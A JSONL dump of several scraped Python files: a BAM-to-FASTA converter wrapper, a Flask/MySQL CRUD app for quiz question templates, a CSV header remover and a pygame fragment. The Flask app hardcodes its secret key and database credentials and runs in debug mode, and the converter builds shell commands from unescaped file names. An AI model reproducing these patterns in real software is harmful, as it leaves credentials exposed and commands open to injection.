self.scroll_y)\n\n screen.fill(constants.COLORS.SILVER)\n screen.blit(self.menu_bar, (0, 0))\n screen.blit(self.game_window, (0, 40))\n\n","sub_path":"perspectives/play_level.py","file_name":"play_level.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557158050","text":"\"\"\"Convert :term:`BAM` format to :term:`fasta` file\"\"\"\nfrom bioconvert import ConvBase\n\n\nclass BAM2Fasta(ConvBase):\n \"\"\"Bam2Fasta converter\n\n Wrapper of bamtools to convert bam file to fasta file.\n\n \"\"\"\n input_ext = ['.bam']\n output_ext = ['fasta', 'fa']\n\n def __init__(self, infile, outfile):\n \"\"\".. rubric:: constructor\n\n :param str infile:\n :param str outfile:\n\n library used: pysam (samtools)\n \"\"\"\n super().__init__(infile, outfile)\n self._default_method = \"bamtools\"\n\n def _method_bamtools(self, *args, **kwargs):\n \"\"\"\n\n .. note:: fastq are split on several lines (80 characters)\n\n \"\"\"\n # Another idea is to use pysam.bam2fq but it fails with unknown error\n #pysam.bam2fq(self.infile, save_stdout=self.outfile)\n #cmd = \"samtools fastq %s >%s\" % (self.infile, self.outfile)\n #self.execute(cmd)\n # !!!!!!!!!!!!!!!!!! pysam.bam2fq, samtools fastq and bamtools convert\n # give differnt answers...\n\n cmd = \"bamtools convert -format fasta -in {0} -out {1}\".format(\n self.infile, self.outfile\n )\n self.execute(cmd)\n\n def _method_samtools(self, *args, **kwargs):\n \"\"\"\n do the conversion :term`BAM` -> :term:'Fasta` using samtools\n\n :return: the standard output\n :rtype: :class:`io.StringIO` object.\n\n .. note:: fasta are on one line\n \"\"\"\n cmd = \"samtools fasta {} > {}\".format(self.infile, self.outfile)\n self.execute(cmd)\n\n","sub_path":"bioconvert/bam2fasta.py","file_name":"bam2fasta.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504469329","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.secret_key = \"root\"\n\n#SqlAlchemy Database Configuration With Mysql\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:root@127.0.0.1:8306/certification'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\n\n#Creating model table for our CRUD database\nclass QuestionTemplates(db.Model):\n id = db.Column(db.Integer, primary_key = True)\n question = db.Column(db.Text)\n answer = db.Column(db.Text)\n correct = db.Column(db.Integer)\n randomize = db.Column(db.Boolean)\n type = db.Column(db.Text) # Enum()\n aota = db.Column(db.Boolean)\n nota = db.Column(db.Boolean)\n enabled = db.Column(db.Boolean)\n comments = db.Column(db.Text)\n\n def __init__(self, question, answer, correct, randomize, type, aota, nota, enabled, comments):\n\n self.question = question \n self.answer = answer \n self.correct = correct \n self.randomize = randomize \n self.type = type \n self.aota = aota \n self.nota = nota \n self.enabled = enabled \n self.comments = comments \n\n\n#This is the index route where we are going to\n#query on all our employee data\n@app.route('/')\ndef Index():\n all_data = QuestionTemplates.query.all()\n\n return render_template(\"index.html\", question_templates = all_data)\n\n\n#this route is for inserting data to mysql database via html forms\n@app.route('/insert', methods = ['POST'])\ndef insert():\n\n if request.method == 'POST':\n\n question = request.form['question']\n answer = request.form['answer']\n correct = request.form['correct']\n randomize = request.form['randomize']\n type = request.form['type']\n aota = request.form['aota']\n nota = request.form['nota']\n enabled = request.form['enabled']\n comments = request.form['comments'] \n\n\n my_data = QuestionTemplates(question, answer, correct, randomize, type, aota, nota, enabled, comments)\n db.session.add(my_data)\n db.session.commit()\n\n flash(\"Question Template Inserted Successfully\")\n\n return redirect(url_for('Index'))\n\n\n#this is our update route where we are going to update our question template\n@app.route('/update', methods = ['GET', 'POST'])\ndef update():\n\n if request.method == 'POST':\n my_data = QuestionTemplates.query.get(request.form.get('id'))\n\n # Determine whether enabled checkbox is checked\n if request.form.get('enabled'):\n my_data.enabled = True\n else:\n my_data.enabled = False\n\n # Entries depend on question type\n\n my_data.type = request.form['type']\n\n if my_data.type == 'Multiple Choice':\n\n # Determine if checkboxes are checked\n if request.form.get('randomize'):\n my_data.randomize = True\n else:\n my_data.randomize = False\n\n if request.form.get('aota'):\n my_data.aota = True\n else:\n my_data.aota = False\n\n if request.form.get('nota'):\n my_data.nota = True\n else:\n my_data.nota = False\n\n # Multiple choice default for correct is 1\n\n correct = request.form['correct']\n if correct is None:\n my_data.correct = 1\n else:\n my_data.correct = correct\n\n my_data.question = request.form['question']\n my_data.answer = request.form['answer']\n my_data.comments = request.form['comments']\n\n elif my_data.type == 'True/False':\n\n my_data.question = request.form['question']\n my_data.answer = request.form['answer']\n my_data.comments = request.form['comments']\n my_data.correct = None\n my_data.randomize = None\n my_data.aota = None\n my_data.nota = None\n\n\n db.session.commit()\n flash(\"Question Template Updated Successfully\")\n\n return redirect(url_for('Index'))\n\n#this is our update route where we are going to update our question template\n#@app.route('/update', methods = ['GET', 'POST'])\n#def update():\n#\n# if request.method == 'POST':\n# my_data = QuestionTemplates.query.get(request.form.get('id'))\n#\n# my_data.question = request.form['question']\n# my_data.answer = request.form['answer']\n# my_data.correct = request.form['correct']\n# my_data.randomize = request.form['randomize']\n# my_data.type = request.form['type']\n# my_data.aota = request.form['aota']\n# my_data.nota = request.form['nota']\n# my_data.enabled = request.form['enabled']\n# my_data.comments = request.form['comments']\n#\n# db.session.commit()\n# flash(\"Question Template Updated Successfully\")\n#\n# return redirect(url_for('Index'))\n\n\n#This route is for deleting our employee\n@app.route('/delete//', methods = ['GET', 'POST'])\ndef delete(id):\n my_data = QuestionTemplates.query.get(id)\n db.session.delete(my_data)\n db.session.commit()\n flash(\"Question Template Deleted Successfully\")\n\n return redirect(url_for('Index'))\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"old_dev/flask/certification_old/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207734411","text":"#! /usr/bin/env python3\n\"\"\"\nremove_csv_header.py - Removes the header from all CSV files in the\ncurrent working directory\n\"\"\"\n\nimport os\nimport csv\n\nos.chdir(os.path.join(os.getcwd(), 'sample_data'))\nos.makedirs('header_removed', exist_ok=True)\n\n# Loop through every file in the cwd\nfor csv_filename in os.listdir():\n if not csv_filename.endswith('.csv'):\n continue # skip non-csv files\n\n print(f'Removing header from {csv_filename}...')\n\n # Read the CSV file in (skipping the first row)\n csv_rows = []\n csv_file_obj = open(csv_filename)\n reader_obj = csv.reader(csv_file_obj)\n for row in reader_obj:\n if reader_obj.line_num == 1:\n continue # skip the first row\n csv_rows.append(row)\n csv_file_obj.close()\n\n # Write the CSV file\n csv_file_obj = open(\n os.path.join('header_removed', csv_filename), 'w', newline='')\n csv_writer = csv.writer(csv_file_obj)\n for row in csv_rows:\n csv_writer.writerow(row)\n csv_file_obj.close()\n","sub_path":"chapter16/programs/remove_csv_header.py","file_name":"remove_csv_header.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}